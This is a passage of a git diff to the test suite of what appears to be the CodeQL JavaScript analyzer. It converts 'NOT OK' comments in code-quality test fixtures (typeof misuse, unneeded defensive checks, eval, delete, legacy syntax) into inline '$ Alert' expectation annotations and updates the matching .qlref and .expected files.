undefined && u.p; // NOT OK - n != undefined && n.p; // NOT OK - o != undefined && o.p; // NOT OK + u != undefined && u.p; // $ Alert[js/unneeded-defensive-code] + n != undefined && n.p; // $ Alert[js/unneeded-defensive-code] + o != undefined && o.p; // $ Alert[js/unneeded-defensive-code] x != undefined && x.p; - u == undefined || u.p; // NOT OK - n == undefined || n.p; // NOT OK - o == undefined || o.p; // NOT OK + u == undefined || u.p; // $ Alert[js/unneeded-defensive-code] + n == undefined || n.p; // $ Alert[js/unneeded-defensive-code] + o == undefined || o.p; // $ Alert[js/unneeded-defensive-code] x == undefined || x.p; - u === undefined || u.p; // NOT OK - n === undefined || n.p; // NOT OK - o === undefined || o.p; // NOT OK + u === undefined || u.p; // $ Alert[js/unneeded-defensive-code] + n === undefined || n.p; // $ Alert[js/unneeded-defensive-code] + o === undefined || o.p; // $ Alert[js/unneeded-defensive-code] x === undefined || x.p; - if (u) { // NOT OK + if (u) { // $ Alert[js/unneeded-defensive-code] u.p; } - if (n) { // NOT OK + if (n) { // $ Alert[js/unneeded-defensive-code] n.p; } - if (o) { // NOT OK + if (o) { // $ Alert[js/unneeded-defensive-code] o.p; } if (x) { x.p; } - u? u():_; // NOT OK - n? n(): _; // NOT OK - o? o(): _; // NOT OK + u? u():_; // $ Alert[js/unneeded-defensive-code] + n? n(): _; // $ Alert[js/unneeded-defensive-code] + o? o(): _; // $ Alert[js/unneeded-defensive-code] x? x(): _; - if (u !== undefined) { // NOT OK + if (u !== undefined) { // $ Alert[js/unneeded-defensive-code] u.p; } - if (n !== undefined) { // NOT OK + if (n !== undefined) { // $ Alert[js/unneeded-defensive-code] n.p; } - if (o !== undefined) { // NOT OK + if (o !== undefined) { // $ Alert[js/unneeded-defensive-code] o.p; } if (x !== undefined) { x.p; } - if (u == undefined){} // NOT OK - if (n == undefined){} // NOT OK - if (o == undefined){} // NOT OK + if (u == undefined){} // $ Alert[js/unneeded-defensive-code] + if (n == undefined){} // $ Alert[js/unneeded-defensive-code] + if (o == undefined){} // $ Alert[js/unneeded-defensive-code] if (x == undefined){} - if (u != undefined){} // NOT OK - if (n != undefined){} // NOT OK - if (o != undefined){} // NOT OK + if (u != undefined){} // $ Alert[js/unneeded-defensive-code] + if (n != undefined){} // $ Alert[js/unneeded-defensive-code] + if (o != undefined){} // $ Alert[js/unneeded-defensive-code] if (x != undefined){} - if (typeof u === "undefined"){} // NOT OK - if (typeof n === "undefined"){} // NOT OK - if (typeof o === "undefined"){} // NOT OK + if (typeof u === "undefined"){} // $ Alert[js/unneeded-defensive-code] + if (typeof n === "undefined"){} // $ Alert[js/unneeded-defensive-code] + if (typeof o === "undefined"){} // $ Alert[js/unneeded-defensive-code] if (typeof x === "undefined"){} function f() { } - typeof f === "function" && f(); // NOT OK - typeof u === "function" && u(); // NOT OK + typeof f === "function" && f(); // $ Alert[js/unneeded-defensive-code] + typeof u === "function" && u(); // $ Alert[js/unneeded-defensive-code] typeof x === "function" && x(); var empty_array = []; @@ -111,9 +111,9 @@ var _true = true; var _false = false; - empty_array && empty_array.pop(); // NOT OK - pseudo_empty_array && pseudo_empty_array.pop(); // NOT OK - non_empty_array && non_empty_array.pop(); // NOT OK + empty_array && empty_array.pop(); // $ Alert[js/unneeded-defensive-code] + pseudo_empty_array && pseudo_empty_array.pop(); // $ Alert[js/unneeded-defensive-code] + non_empty_array && non_empty_array.pop(); // $ Alert[js/unneeded-defensive-code] empty_string && empty_string.charAt(0); non_empty_string && non_empty_string.charAt(0); zero && zero(); @@ -121,23 +121,23 @@ _true && _true(); _false && _false(); - (u !== undefined && u !== null) && u.p; // NOT OK - u !== undefined && u !== null && u.p; // NOT OK + (u !== undefined && u !== null) && u.p; // $ Alert[js/unneeded-defensive-code] + u !== undefined && u !== null && u.p; // $ Alert[js/unneeded-defensive-code] - u != undefined && u != null; // NOT OK - u == undefined || u == null; // NOT OK - u !== undefined && u !== null; // NOT OK - !(u === undefined) && !(u === null); // NOT OK - u === undefined || u === null; // NOT OK - !(u === undefined || u === null); // NOT OK - !(u === undefined) && u !== null; // NOT OK + u != undefined && u != null; // $ Alert[js/unneeded-defensive-code] + u == undefined || u == null; // $ Alert[js/unneeded-defensive-code] + u !== undefined && u !== null; // $ Alert[js/unneeded-defensive-code] + !(u === undefined) && !(u === null); // $ Alert[js/unneeded-defensive-code] + u === undefined || u === null; // $ Alert[js/unneeded-defensive-code] + !(u === undefined || u === null); // $ Alert[js/unneeded-defensive-code] + !(u === undefined) && u !== null; // $ Alert[js/unneeded-defensive-code] u !== undefined && n !== null; - u == undefined && u == null; // NOT OK + u == undefined && u == null; // $ Alert[js/unneeded-defensive-code] x == undefined && x == null; - x === undefined && x === null; // NOT OK + x === undefined && x === null; // $ Alert[js/unneeded-defensive-code] if (x === undefined) { - if (x === null) { // NOT OK + if (x === null) { // $ Alert[js/unneeded-defensive-code] } } @@ -153,16 +153,16 @@ } } - x != undefined && x != null; // NOT OK + x != undefined && x != null; // $ Alert[js/unneeded-defensive-code] if (x != undefined) { - if (x != null) { // NOT OK + if (x != null) { // $ Alert[js/unneeded-defensive-code] } } - if (typeof x !== undefined); - if (typeof window !== undefined); + if (typeof x !== undefined); // $ Alert[js/comparison-between-incompatible-types] + if (typeof window !== undefined); // $ Alert[js/comparison-between-incompatible-types] if (typeof x !== x); - if (typeof x !== u); // NOT OK + if (typeof x !== u); // $ Alert[js/comparison-between-incompatible-types] if (typeof window !== "undefined"); if (typeof module !== "undefined"); @@ -172,12 +172,12 @@ if (typeof module !== "undefined" && module.exports); if (typeof global !== "undefined" && global.process); - u && (f(), u.p); - u && (u.p, f()); // technically not OK, but it seems like an unlikely pattern - u && !u.p; // NOT OK - u && !u(); // NOT OK + u && (f(), u.p); // $ Alert[js/trivial-conditional] + u && (u.p, f()); // $ Alert[js/trivial-conditional] - technically not OK, but it seems like an unlikely pattern + u && !u.p; // $ Alert[js/unneeded-defensive-code] + u && !u(); // $ Alert[js/unneeded-defensive-code] + - function hasCallbacks(success, error) { if (success) success() if (error) error() diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst2.js b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst2.js index 588844f9c75f..eb0dee8c535e 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst2.js +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst2.js @@ -1,7 +1,7 @@ (function(){ var v; (function(){ - if(typeof v === "undefined"){ // NOT OK + if(typeof v === "undefined"){ // $ Alert[js/unneeded-defensive-code] v = 42; } for(var v in x){ @@ -9,10 +9,10 @@ }); }); -const isFalsyObject = (v) => typeof v === 'undefined' && v !== undefined; // OK +const isFalsyObject = (v) => typeof v === 'undefined' && v !== undefined; function f(v) { - if (typeof v === 'undefined' && v !== undefined) { // OK + if (typeof v === 'undefined' && v !== undefined) { doSomething(v); } } diff --git a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.expected b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.expected index 81cd1fac8fd5..82d959bca090 100644 --- a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.expected +++ b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.expected @@ -1,3 +1,3 @@ | tst.js:2:9:2:16 | x + x>>1 | Whitespace around nested operators contradicts precedence. | | tst.js:42:9:42:20 | p in o&&o[p] | Whitespace around nested operators contradicts precedence. | -| tst.js:49:1:49:12 | x + x >> 1 | Whitespace around nested operators contradicts precedence. | +| tst.js:48:1:48:12 | x + x >> 1 | Whitespace around nested operators contradicts precedence. | diff --git a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.qlref b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.qlref index 4905e880b56a..b1d60a5feea0 100644 --- a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.qlref +++ b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.qlref @@ -1 +1,2 @@ -Expressions/WhitespaceContradictsPrecedence.ql \ No newline at end of file +query: Expressions/WhitespaceContradictsPrecedence.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js index d9942a5ec4a8..30b75270f946 100644 --- a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js +++ b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js @@ -1,35 +1,35 @@ function bad(x) { - return x + x>>1; + return x + x>>1; // $ Alert } function ok1(x) { - return x + x >> 1; + return x + x >> 1; } function ok2(x) { - return x+x >> 1; + return x+x >> 1; } function ok3(x) { - return x + (x>>1); + return x + (x>>1); } function ok4(x, y, z) { return x + y + z; } - + function ok5(x, y, z) { return x + y+z; } function ok6(x) { - return x + x>> 1; + return x + x>> 1; } function ok7(x, y, z) { return x + y - z; } - + function ok8(x, y, z) { return x + y-z; } @@ -38,18 +38,17 @@ function ok9(x, y, z) { return x * y*z; } -function ok10(o, p) { - return p in o&&o[p]; +function bad10(o, p) { + return p in o&&o[p]; // $ Alert } -// OK + x==y ** 2; -// NOT OK -x + x >> 1 +x + x >> 1 // $ Alert + -// OK x + x >> 1 -// OK (asm.js-like) -x = x - 1|0; \ No newline at end of file +// OK - asm.js-like +x = x - 1|0; diff --git a/javascript/ql/test/query-tests/JSDoc/BadParamTag/BadParamTag.qlref b/javascript/ql/test/query-tests/JSDoc/BadParamTag/BadParamTag.qlref index 13e42724d606..478f17148e10 100644 --- a/javascript/ql/test/query-tests/JSDoc/BadParamTag/BadParamTag.qlref +++ b/javascript/ql/test/query-tests/JSDoc/BadParamTag/BadParamTag.qlref @@ -1 +1 @@ -JSDoc/BadParamTag.ql \ No newline at end of file +query: JSDoc/BadParamTag.ql diff --git a/javascript/ql/test/query-tests/JSDoc/JSDocForNonExistentParameter/JSDocForNonExistentParameter.qlref b/javascript/ql/test/query-tests/JSDoc/JSDocForNonExistentParameter/JSDocForNonExistentParameter.qlref index 05473298ac8d..75206f43fafb 100644 --- a/javascript/ql/test/query-tests/JSDoc/JSDocForNonExistentParameter/JSDocForNonExistentParameter.qlref +++ b/javascript/ql/test/query-tests/JSDoc/JSDocForNonExistentParameter/JSDocForNonExistentParameter.qlref @@ -1 +1 @@ -JSDoc/JSDocForNonExistentParameter.ql \ No newline at end of file +query: JSDoc/JSDocForNonExistentParameter.ql diff --git a/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/UndocumentedParameter.expected b/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/UndocumentedParameter.expected index 6b028267ff76..4ed958a048a1 100644 --- a/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/UndocumentedParameter.expected +++ b/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/UndocumentedParameter.expected @@ -1,2 +1,2 @@ -| tst.js:6:15:6:15 | y | Parameter y is not documented. | -| tst.js:26:19:26:19 | y | Parameter y is not documented. | +| tst.js:4:15:4:15 | y | Parameter y is not documented. | +| tst.js:23:19:23:19 | y | Parameter y is not documented. | diff --git a/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/UndocumentedParameter.qlref b/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/UndocumentedParameter.qlref index 8c3b2613cba3..d6b0343c6c02 100644 --- a/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/UndocumentedParameter.qlref +++ b/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/UndocumentedParameter.qlref @@ -1 +1,2 @@ -JSDoc/UndocumentedParameter.ql \ No newline at end of file +query: JSDoc/UndocumentedParameter.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/tst.js b/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/tst.js index b785e06507a7..6143b7084c3b 100644 --- a/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/tst.js +++ b/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/tst.js @@ -1,9 +1,7 @@ /** - * NOT OK: Parameter y is not documented. - * * @param x The first operand. */ -function f(x, y) { +function f(x, y) { // $ Alert return x+y; } @@ -14,7 +12,6 @@ function g(x, y) { return x+y; } -// NOT OK /** * @param {int} x * @param {float} y @@ -23,6 +20,6 @@ var o = { /** * @param {String} x first argument. */ - f : function(x, y) { + f : function(x, y) { // $ Alert } }; diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ArgumentsCallerCallee/ArgumentsCallerCallee.qlref b/javascript/ql/test/query-tests/LanguageFeatures/ArgumentsCallerCallee/ArgumentsCallerCallee.qlref index 6f22e925dbd1..fd66fb21e620 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ArgumentsCallerCallee/ArgumentsCallerCallee.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/ArgumentsCallerCallee/ArgumentsCallerCallee.qlref @@ -1 +1,2 @@ -LanguageFeatures/ArgumentsCallerCallee.ql \ No newline at end of file +query: LanguageFeatures/ArgumentsCallerCallee.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ArgumentsCallerCallee/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/ArgumentsCallerCallee/tst.js index 32b12e606bc6..d988977efdd8 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ArgumentsCallerCallee/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/ArgumentsCallerCallee/tst.js @@ -1,7 +1,7 @@ (function (i) { if (i <= 1) return 1; - return i*arguments.callee(i-1); + return i*arguments.callee(i-1); // $ Alert }(3)); function f() { @@ -9,7 +9,7 @@ function f() { } function g() { - return arguments.caller.length; + return arguments.caller.length; // $ Alert } function h(arguments) { diff --git a/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/BadTypeof.expected b/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/BadTypeof.expected index bffe622dc7e0..7be415438250 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/BadTypeof.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/BadTypeof.expected @@ -1,3 +1,3 @@ -| tst.js:2:1:2:8 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:2:14:2:20 | 'array' | array | -| tst.js:19:9:19:16 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:23:6:23:11 | 'null' | null | -| tst.js:33:2:33:9 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:33:16:33:22 | 'array' | array | +| tst.js:1:1:1:8 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:1:14:1:20 | 'array' | array | +| tst.js:18:9:18:16 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:21:6:21:11 | 'null' | null | +| tst.js:30:2:30:9 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:30:16:30:22 | 'array' | array | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/BadTypeof.qlref b/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/BadTypeof.qlref index ebbb3c84a1e5..9ed7fa52f7cc 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/BadTypeof.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/BadTypeof.qlref @@ -1 +1,2 @@ -LanguageFeatures/BadTypeof.ql \ No newline at end of file +query: LanguageFeatures/BadTypeof.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/tst.js index de01c66ac808..9401c80cba52 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/tst.js @@ -1,36 +1,33 @@ -// NOT OK -typeof a === 'array'; +typeof a === 'array'; // $ Alert + -// OK typeof b == 'string'; -// OK + typeof c != "string"; -// OK + "number" !== typeof 23; -// OK + 'object' == typeof null; -// OK + typeof es6 === 'symbol'; -switch (typeof a) { -// OK +switch (typeof a) { // $ Alert + case 'undefined': -// NOT OK case 'null': } -// OK + switch (msg) { case 'null': case typeof a: } -// NOT OK -(typeof a) === 'array'; +(typeof a) === 'array'; // $ Alert // JScript extensions typeof a === 'unknown' || typeof a === 'date'; diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ConditionalComments/ConditionalComments.qlref b/javascript/ql/test/query-tests/LanguageFeatures/ConditionalComments/ConditionalComments.qlref index 8c331480b29c..908167804bcb 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ConditionalComments/ConditionalComments.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/ConditionalComments/ConditionalComments.qlref @@ -1 +1 @@ -LanguageFeatures/ConditionalComments.ql +query: LanguageFeatures/ConditionalComments.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/DebuggerStatement/DebuggerStatement.qlref b/javascript/ql/test/query-tests/LanguageFeatures/DebuggerStatement/DebuggerStatement.qlref index 6ec39aa879d7..ba16fbb07ece 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/DebuggerStatement/DebuggerStatement.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/DebuggerStatement/DebuggerStatement.qlref @@ -1 +1,2 @@ -LanguageFeatures/DebuggerStatement.ql +query: LanguageFeatures/DebuggerStatement.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/DebuggerStatement/debuggerStatement.js b/javascript/ql/test/query-tests/LanguageFeatures/DebuggerStatement/debuggerStatement.js index b456e6b2b1d4..7c4a7fb098ef 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/DebuggerStatement/debuggerStatement.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/DebuggerStatement/debuggerStatement.js @@ -1,3 +1,3 @@ function sayHello() { - debugger; + debugger; // $ Alert } diff --git a/javascript/ql/test/query-tests/LanguageFeatures/DeleteVar/DeleteVar.qlref b/javascript/ql/test/query-tests/LanguageFeatures/DeleteVar/DeleteVar.qlref index 0da47afc6a0e..70d65313b52a 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/DeleteVar/DeleteVar.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/DeleteVar/DeleteVar.qlref @@ -1 +1,2 @@ -LanguageFeatures/DeleteVar.ql \ No newline at end of file +query: LanguageFeatures/DeleteVar.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/DeleteVar/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/DeleteVar/tst.js index 1641372a53cc..8a6a7613d7a7 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/DeleteVar/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/DeleteVar/tst.js @@ -1,8 +1,8 @@ delete this.Object; -delete String; +delete String; // $ Alert function f(o, x) { delete o.p; delete o[x]; - delete x; + delete x; // $ Alert delete (o.p); } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/EmptyArrayInit/EmptyArrayInit.qlref b/javascript/ql/test/query-tests/LanguageFeatures/EmptyArrayInit/EmptyArrayInit.qlref index f4decec514b3..142d91688dae 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/EmptyArrayInit/EmptyArrayInit.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/EmptyArrayInit/EmptyArrayInit.qlref @@ -1 +1,2 @@ -LanguageFeatures/EmptyArrayInit.ql \ No newline at end of file +query: LanguageFeatures/EmptyArrayInit.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/EmptyArrayInit/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/EmptyArrayInit/tst.js index 69daffb8a0b0..cf64a97a4d10 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/EmptyArrayInit/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/EmptyArrayInit/tst.js @@ -1,7 +1,7 @@ -var a = [], // OK - b = [1], // OK - c = [1, 2], // OK - d = [1, , 2], // NOT OK - e = [1,], // OK - f = [1, 2, ,], // NOT OK - g = [,1]; // NOT OK +var a = [], + b = [1], + c = [1, 2], + d = [1, , 2], // $ Alert + e = [1,], + f = [1, 2, ,], // $ Alert + g = [,1]; // $ Alert diff --git a/javascript/ql/test/query-tests/LanguageFeatures/Eval/Eval.qlref b/javascript/ql/test/query-tests/LanguageFeatures/Eval/Eval.qlref index 65753c6e2076..f6cdc87d5359 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/Eval/Eval.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/Eval/Eval.qlref @@ -1 +1,2 @@ -LanguageFeatures/Eval.ql +query: LanguageFeatures/Eval.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/Eval/eval.js b/javascript/ql/test/query-tests/LanguageFeatures/Eval/eval.js index 54ab88cd23e3..7845f9f07460 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/Eval/eval.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/Eval/eval.js @@ -1,4 +1,4 @@ function sayHello() { - eval("2+2"); + eval("2+2"); // $ Alert anotherFunction("2+2"); } diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/ExpressionClosures.expected b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/ExpressionClosures.expected index f3c95f56d3d2..01e87bf5c177 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/ExpressionClosures.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/ExpressionClosures.expected @@ -3,4 +3,4 @@ | letExpr.js:3:13:3:38 | let (x ... ) x + y | Use let declarations instead of let expressions. | | letStmt.js:3:1:5:1 | let (x ... + y);\\n} | Use let declarations instead of let statements. | | postfixComprehension.js:2:15:2:38 | [i*i fo ... mbers)] | Use prefix comprehensions instead of postfix comprehensions. | -| tst.js:2:15:2:31 | function(x) x * x | Use arrow expressions instead of expression closures. | +| tst.js:1:15:1:31 | function(x) x * x | Use arrow expressions instead of expression closures. | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/ExpressionClosures.qlref b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/ExpressionClosures.qlref index 422b2aeab8ee..ab1619db7165 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/ExpressionClosures.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/ExpressionClosures.qlref @@ -1 +1,2 @@ -LanguageFeatures/ExpressionClosures.ql \ No newline at end of file +query: LanguageFeatures/ExpressionClosures.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/foreach.js b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/foreach.js index 1df300534371..2f22bc5dce39 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/foreach.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/foreach.js @@ -3,6 +3,6 @@ var obj = {prop1: 5, prop2: 13, prop3: 8}; for each (var item in obj) { sum += item; -} +} // $ Alert console.log(sum); // logs "26", which is 5+13+8 diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/jscript.js b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/jscript.js index 0f6a81c8fb36..7b85bc8720f3 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/jscript.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/jscript.js @@ -1,3 +1,3 @@ -function window::onload() {} +function window::onload() {} // $ Alert window.onload = function onload() {} diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/letExpr.js b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/letExpr.js index a5c7a09b6be5..7c4b6c4eb804 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/letExpr.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/letExpr.js @@ -1,5 +1,5 @@ var x = 42, y = 19; -console.log(let (x = 23, y = 19) x + y); +console.log(let (x = 23, y = 19) x + y); // $ Alert console.log(x - y); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/letStmt.js b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/letStmt.js index 69beaac8a096..3b62e7f0d14c 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/letStmt.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/letStmt.js @@ -2,6 +2,6 @@ var x = 42, y = 19; let (x = 23, y = 19) { console.log(x + y); -} +} // $ Alert console.log(x - y); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/postfixComprehension.js b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/postfixComprehension.js index 3cca1b5c615f..181c90cfa7fe 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/postfixComprehension.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/postfixComprehension.js @@ -1,4 +1,4 @@ var numbers = [1, 2, 3, 4, 5]; -var squares = [i*i for (i of numbers)]; +var squares = [i*i for (i of numbers)]; // $ Alert var specialKeyCodes = [for (keyCodeName of Object.keys(SPECIAL_CODES_MAP)) SPECIAL_CODES_MAP[keyCodeName]]; diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/tst.js index 202ea2a262a6..610590712eeb 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/tst.js @@ -1,8 +1,7 @@ -// NOT OK -[1, 2, 3].map(function(x) x * x); +[1, 2, 3].map(function(x) x * x); // $ Alert + -// OK [1, 2, 3].map(function(x) { return x * x; }); -// OK + [1, 2, 3].map((x) => x * x); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ForInComprehensionBlocks/ForInComprehensionBlocks.qlref b/javascript/ql/test/query-tests/LanguageFeatures/ForInComprehensionBlocks/ForInComprehensionBlocks.qlref index 57bc034bdf70..d5b6deb7355b 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ForInComprehensionBlocks/ForInComprehensionBlocks.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/ForInComprehensionBlocks/ForInComprehensionBlocks.qlref @@ -1 +1,2 @@ -LanguageFeatures/ForInComprehensionBlocks.ql \ No newline at end of file +query: LanguageFeatures/ForInComprehensionBlocks.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ForInComprehensionBlocks/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/ForInComprehensionBlocks/tst.js index 08542e2be521..3ada68d3cf02 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ForInComprehensionBlocks/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/ForInComprehensionBlocks/tst.js @@ -1,2 +1,2 @@ var a = [23,,42]; -var desc = [for(i in a) i + " = a[" + i + "]"]; +var desc = [for(i in a) i + " = a[" + i + "]"]; // $ Alert diff --git a/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/IllegalInvocation.qlref b/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/IllegalInvocation.qlref index 1297139b9f9a..d1cf5afbb2ac 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/IllegalInvocation.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/IllegalInvocation.qlref @@ -1 +1,2 @@ -LanguageFeatures/IllegalInvocation.ql \ No newline at end of file +query: LanguageFeatures/IllegalInvocation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js index 3ed85a709341..48af86687794 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js @@ -4,24 +4,24 @@ class C { class D extends C { constructor() { - super(); // OK + super(); } } -let c = new C(); // OK -C(); // NOT OK -new (x=>x); // NOT OK -c.m(); // OK -new c.m(); // NOT OK - but not flagged +let c = new C(); +C(); // $ Alert +new (x=>x); // $ Alert +c.m(); +new c.m(); // $ MISSING: Alert var o = { f: function() {}, g() {} }; -o.f(); // OK -new o.f(); // OK -o.g(); // OK -new o.g(); // NOT OK - but not flagged +o.f(); +new o.f(); +o.g(); +new o.g(); // $ MISSING: Alert function f(b) { var g; @@ -31,31 +31,31 @@ function f(b) { g = (() => {}); 